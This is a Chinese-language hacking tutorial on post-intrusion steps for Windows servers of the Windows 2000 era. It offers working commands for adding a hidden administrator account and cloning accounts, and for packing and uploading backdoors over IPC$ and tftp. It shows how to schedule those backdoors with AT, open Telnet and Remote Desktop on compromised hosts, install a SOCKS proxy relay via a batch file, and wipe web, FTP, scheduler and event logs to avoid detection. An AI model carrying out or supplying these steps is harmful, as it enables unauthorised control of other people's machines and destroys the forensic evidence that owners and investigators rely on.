一.获得权限(不在讨论的范围,我们只讨论入侵系统后的该做的事情) 


二.建立超级权限用户 
(1)建立用户: 
如:net user system$ hacker /add 
net localgroup administrators system$ /add 
说明:上面的两个命令就是建立一个名字叫"system$",密码为"hacker"的超级权限用户 
(2) 克隆超级用户: 
可以使用CA工具来实现超级用户的可隆了,前提是只要拥有目标系统的管理员权限得帐号和密码. 
ca \ip administrator password IUSR_name password 
说明: administrator--管理员帐号 password--管理员帐号的密码   
IUSR_name--系统已经存在的较低权限的用户 password--克隆用户的密码 
cca:检查克隆结果的工具. 
cca \ip user password 
user:被克隆的帐号 
password:密码 


三.建立后门 
(1)上传后门程序(方法较多,只说常用的两种): 
上传后门比如wollf,winshell等常用的后门,最好把后门加一个壳,比如用UPX或者是ASPack等加壳,就不容易被病毒防火墙给查杀. 

把后门上传的方法: 
(a)使用IPC$: 先和对方建立一个连接: 
net use \对方IP地址\ipc$ "密码" /user:"用户名" 
建立成功后就可以上传后门: 
copy c:\hack\wollf.exe \IP\admin$ 
说明:把你C盘下的wollf后门传到对方的x:\winnt下,或者是windows目录下 
(b)使用tftp: 前提是你进入了对方的系统,比如你通过telnet进入了对方系统,就 
可以在对方的shell下从你的机器中传后门到对方的系统: 
tftp -i 你的IP get wollf.exe 
说明:把你机器中的wollf.exe下载到对方的系统目录下,前提是对方没有禁止tftp并且你有独立的IP地址(局域网的机器不行),你自己的机器打开tftpd32这个ftp工具,它就会监听你的69端口的连接,然后你就可以在对方的机器上来下载你机器的东西. 

(2)运行后门: 
(a)使用AT命令:   
先获得对方系统的时间: net time \对方的IP 
的到对方的时间后就使用AT命令: at \对方IP 后门运行的时间 后门所在对方系统的路径 
例: at \192.168.0.1 11:02 c:\winnt\system32\wollf.exe 
注意:你要执行AT命令,前提是你与对方建立了IPC$连接,并且你获得对方系统的时间后,你运行后门的时   间必须要后几分钟.除了可以使用AT命令之后,还可以使用一款工具叫psexec.exe来实现AT的功能. 
(b)使用"流光"的"种植者"来实现拷备和运行后门,这个方法你可以参考"流光"的帮助文件 
(c)直接运行后门: 
你比如登陆了对方的系统,比如你使用Telnet进入了对方的系统后就可以直接运行了. 
假如对方没有开Telnet,那么我们就可以帮它打开.   
打开对方的Telnet的方法: 
我们可以使用opentelnet.exe这个工具来实现,前提是必须具有目标系统的管理员权限和开了IPC$, 
命令如下: 
opentelnet \ip username password NTLMauthor Telnetport 
说明: \ip--目标IP username--用户名   password--密码 
NTLMauthor--NTLM的验证方式   Telnetport--端口 
验证方式有:0:代表不使用NTLM验证 1:代表先尝试使用NTLM验证,失败后用密码验证 2:只使用NTLM验证 
执行成功后,就可以使用Telnet 对方IP 端口 或者 nc -vv 对方的IP 端口 来登陆目标机器了. 


四.做代理服务器 
为什么要做代理我就不用说了吧,我们就说说怎么做代理吧. 
这里我们用到一个工具skserver.exe,是snake写的一个代理工具,做跳板不错! 
先写好一个批处理,内容如下: 
@echo *********************************************** 
@echo         安装socket代理的批处理 
@echo           by heiyeluren 
@echo     CQSN---http://www.hackerxfiles.com/ 
@echo *********************************************** 
@pause 
@skserver -install 
@echo Install... Succeed! 
@skserver -config port 1983 
@echo Set port in 1983... Succeed! 
@skserver -config starttype 2 
@echo Set starttype is autostart... Succeed! 
@net start skserver 
@echo Start service... Succeed! 
@echo OK... Install End! 
@pause 
@exit 

以上的批处理你可以自己根据情况更改,其中的skserver可以改成你该成后门的名字,不过下面"net start skserver"不能改,这是该工具默认的服务名,端口你也可以改成你需要的.把skserver.exe传到对方的系统后,再运行该批处理,就可以从对方1983端口来连接代理,可以通过sockCap来做代理服务器,最多可以跳254级看谁能找到你,呵呵呵~~~ 


五.开超级终端 
如果对方是win2000 server以上的系统的话,就可以打开对方的超级终端来尽心更好的远程控制,大家都说开3389肉鸡是极品嘛,现在我们就来试试!~~ 

(1)手工开终端: 
进入目标系统后,在命令提示符下面输入下面的内容: (假设系统在C:\winnt下面) 
echo [Components] > c:89 
echo TSEnable = on >> c:89 
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:89 /q 
(可以在加上参数/r,可以抑制重新启动,不加安装完后就重启)或者你可以写好这个文件,然后传到对方的系统下: 
[Components] 
TSEnable = on 
保存为3389文件,然后运行sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:89 /q 这个命令,对方重启后你 就拥有了一个3389的肉鸡啦,就可以通过"远程桌面连接"来连接对方,从windows下控制对方了. 

(2)利用工具: 
这里用到一款叫Dixyxs.exe的小工具来开对方的终端. 
把该工具上传到对方的系统中,然后执行该程序:dixyxs.exe后等一会肉鸡会自动重启，重启后会出现终端服务 


六.清除日志 
当你做了这一切之后,那么你不想三分钟被查到吧?那么就应该清除日志. 
windows的日志有:www日志,FTP日志,DNS日志,安全日志,系统日志,应用程序日志等等. 

(1)手工清除日志: 
有些日志是一定要删除的,比如web,ftp等日志. 

日志文件默认位置： 
应用程序日志、安全日志、系统日志、DNS日志默认位置：%systemroot%\system32 
\config，默认文件大小512KB，管理员都会改变这个默认大小。 
安全日志文件：%systemroot%\system32\config\SecEvent.EVT 
系统日志文件：%systemroot%\system32\config\SysEvent.EVT 
应用程序日志文件：%systemroot%\system32\config\AppEvent.EVT 
IIS的FTP日志默认位置：%systemroot%\system32\logfiles\msftpsvc1\，默认每天一个日志 
IIS的WWW日志默认位置：%systemroot%\system32\logfiles\w3svc1\，默认每天一个日志 
Scheduler服务日志默认位置：%systemroot%\schedlgu.txt 

我们把相关的服务停止后就可以删除了: 
停止服务: net stop w3svc 
然后几可以删除日志,www服务的日志是在:c:\winnt\system32\LogFiles\W3SVC1目录下;FTP服务的日志在c:\winnt\system32\LogFiles\MSFTPSVC1目录下.然后就可以使用del了: 
del c:\winnt\system32\LogFiles\W3SVC1\*.* /q 
del c:\winnt\system32\LogFiles\MSFTPSVC1\*.* /q 
然后是Scheduler日志,停止该服务: net stop "task scheduler" 
然后del c:\winnt\schedlgu.txt /q就可以了~ 

像安全日志,系统日志,应用程序日志等关联的服务是Eventlog,该服务是无法停止的,所以如果我们手工删除这些日志的话,就要通过一个很慢的方法: 
打开“控制面板”的"管理工具"中的"事件查看器"在菜单的"操作"项有一个名为"连接到另一台计算机"的菜单，点击它如下图所示：输入远程计算机的IP，然后等上一段时间(根据双方的网速),然后打开对方的计算机的"事件查看器"：选择远程计算机的"安全性"日志，右键选择它的属性:点击属性里的"清除日志"按钮，OK！安全日志清除完毕!同样的方法清除"系统"日志和"应用程序"日志! 

(2)利用工具删除日志 
利用工具来删除那些日志就简单多啦! 
(A)删除IIS服务相关的WWW日志和FTP日志可以使用CleanIISLog.exe这个小工具. 
用法: 
先用ipc$管道进行连接:net use \ip\ipc$ "password" /user:"" 
然后就可以使用下面的命令: 
cleaniislog [logfile]|[.] [cleanIP]|. 
说明: 清除的日志文件,.代表所有   清除的日志中哪个IP地址的记录,.代表所有IP记录 
举例:cleaniislog . 127.0.0.1 
a.可以清除指定的的IP连接记录，保留其他IP记录。 
b.当清除成功后，CleanIISLog会在系统日志中将本身的运行记录清除。 
用法: CleanIISLog <LogFile>|<.> <CleanIP>|<.> 
<LogFile>: 指定要处理的日志文件，如果指定为“.”，则处理所有的日志文件注意：处理所有日志文件需要很长的时间）。 
<CleanIP>: 指定要清除的IP记录，如果指定为“.”，则清除所有的IP记录（不推荐这样做）。 
CleanIISLog只能在本地运行，而且必须具有Administrators权限。 

(B)删除安全日志,系统日志和应用程序日志,可以使用elsave.exe这个小工具. 
使用方法: 
先用ipc$管道进行连接:net use \ip\ipc$ "password" /user:"" 
清除目标系统的应用程序日志: 
elsave -s \ip -l "application" -C 
清除目标系统的系统日志: 
elsave -s \ip -l "system"" -C 
清除目标系统的安全日志: 
elsave -s \ip -l "security" -C 

(C)logkiller.exe这个工具可以把对方的所有日志都删除,包括"应用程序日志","安全日志"和"系统日志",IIS的FTP服务，IIS的SMTP服务日志和IIS的WWW服务日志,以及计划任务日志等日志. 
使用方法:把该工具上传到对方的系统中后直接运行. 
例: c:\winnt\system32\logkiller.exe 


七.后面的话 

说到这里,差不多入侵一个系统后该做的工作都差不多了吧.当然,你要做别的工作也是可以的,不是限定非要按照上面的模式的,只不过上面的是一个比较基本常用的模式. 比如你还可以设置VNC等远程控制软件或者把肉鸡做成你的FTP服务器等都是可以的,但是前提是你一定要注意安全,不要留下不必要的痕迹. 
不知道大家有没有发现一个情况,就是我们都是使用各式各样的工具来完成我们的任务的,这样不誓不罢休好,但是使用了太多的工具的话,对我们的技术并没有太大的进步,所以希望大家能够不使用工具就不要使用,比如可以使用手工的就尽量用手工来做,这样的话你会"知其然,更知所以然",不是很好?